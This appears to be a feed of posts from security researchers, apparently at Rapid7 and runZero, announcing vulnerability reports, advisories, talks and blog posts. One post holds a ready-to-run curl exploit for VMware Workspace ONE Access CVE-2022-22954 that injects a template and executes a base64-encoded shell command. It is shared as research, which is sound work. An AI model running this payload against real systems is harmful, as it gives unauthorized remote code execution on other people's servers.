Rapid7's vulnerability intelligence report is out today and features analysis from folks like Jacob Baines, Spencer McIntyre, Unsolicited Dog Pics and a bunch of the Metasploit Project team. We tracked hundreds of data points across 50 high-impact vulns. Key points: (1/n) rapid7.com/info/2021-vuln…

Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'

Today is the day! The Metasploit pivoting walkthrough challenge is live on tryhackme.com/christmas. It's free to sign up!

Advisory for a number of document management system (DMS) vulnerabilities I discovered. #XSS rapid7.com/blog/post/2023…

Ahoy! I'm looking for an attack + vulnerability research leader to join Ron Bowes (defunct) and Stephen Fewer in driving 0day + n-day research, identifying/developing new attack techniques, and helping set overall research strategy. U.S. ET time zone, job description coming soon. DMs open!

Excellent technical analysis

Really excited to be speaking at DEF CON this year! My talk is titled "SpamChannel: Spoofing Emails from +2M Domains and Virtually becoming Satan" Love/hate Email security? Want your phishing campaigns to be a whole lot easier ? you should def come to my talk! 😈 #defcon31

Full Rapid7 analysis of PAN-OS CVE-2024-3400 now available from Stephen Fewer and our stellar new research teammate @ChairNectar! Spoiler: It's a two-vuln exploit chain. attackerkb.com/topics/SSTk336…

I see "Not all vulnerabilities are created equal" pop up a lot these days in marketing materials for various security companies. We may not have truly been the first to coin that phrase, but AttackerKB's been using it since early 2020! attackerkb.com/about

Rapid7's 2024 Attack Intelligence Report was released today and includes insights from 14 months of vulnerability and exploit analysis, thousands of ransomware incidents, 180+ APT campaigns, and a year+ of Rapid7 incident response findings. rapid7.com/research/repor…

CVE and vendor advisory now available on the #FortiManager 0day that's been knocking around the rumor mill (and evidently some Fortinet customers' email inboxes) for a while. Mitigate immediately, but IOCs need investigating, too. rapid7.com/blog/post/2024…

We have just published our AttackerKB Rapid7 Analysis for CVE-2024-47575, the recent FortiManager 0day, aka FortiJump 🔥 Read our full technical analysis; detailing firmware decryption, protocol analysis, and unauthenticated RCE 🚀 attackerkb.com/topics/OFBGprm…

I spoke with Robert Vamosi (@[email protected]) on ErrodCode podcast awhile back on "Hacking Cellular-Enabled IoT Devices" We had a fun conversation. The podcast was just published so please check it out - errorcode.podbean.com/e/ep-52-hackin…

A PSA for why you should probably not use Postman (it can leak secrets to them): anonymousdata.medium.com/postman-is-log…

I'm excited to announce our "Out-of-Band" series; focused on the security risks of management devices like BMCs, serial servers, and KVMs. "Out-of-Band, Part 1: The new generation of IP KVMs and how to find them" is now live at: runzero.com/blog/oob-p1-ip…

🗣️ Happening today at Black Hat Arsenal! Join Matthew Kienow & Deral Heiland at 11am PDT for a live demo of Akheron Proxy, a tool for bridging, capturing, replaying, and manipulating UART inter-chip communications. 📍 Business Hall, Arsenal Station 9 🔗 runzero.com/black-hat-arse…

🎙 Hacker Summer Camp recap drops today on runZero Hour! ✅ HD Moore on SSH vulns + SSHamble ✅ Akheron Proxy w/ Matthew Kienow & Deral Heiland ✅ Tod Beardsley is @[email protected] unveils EPSS Pulse ✅ Rob King on OT detection across protocol gateways. 📅 Aug 20 | 10AM PT 🔗 runzero.com/research/runze…

🎥 Missed runZero Hour live? Catch it on demand! We recap Hacker Summer Camp highlights: ✅ HD Moore on SSH vulns + SSHamble updates ✅ Akheron Proxy w/ Matthew Kienow & Deral Heiland ✅ Tod Beardsley is @[email protected] unveils EPSS Pulse ✅ OT protocol insights from Rob King 👉 runzero.com/resources/runz…

An unauthenticated RCE PoC for the React vuln (CVE-2025-55182) is now public. Confirmed to work on my test setup (Next.js 16.0.6 with React 19.2.0).

EOS edge devices exposed to the internet = a 'please hack me' sign on your front door. CISA agrees. And that's what BOD 26-02 is all about. In our latest blog, Tod Beardsley is @[email protected], Matthew Kienow & Colin Dupreay break down how runZero customers can get ahead. 👉 runzero.com/blog/cisa-bod-…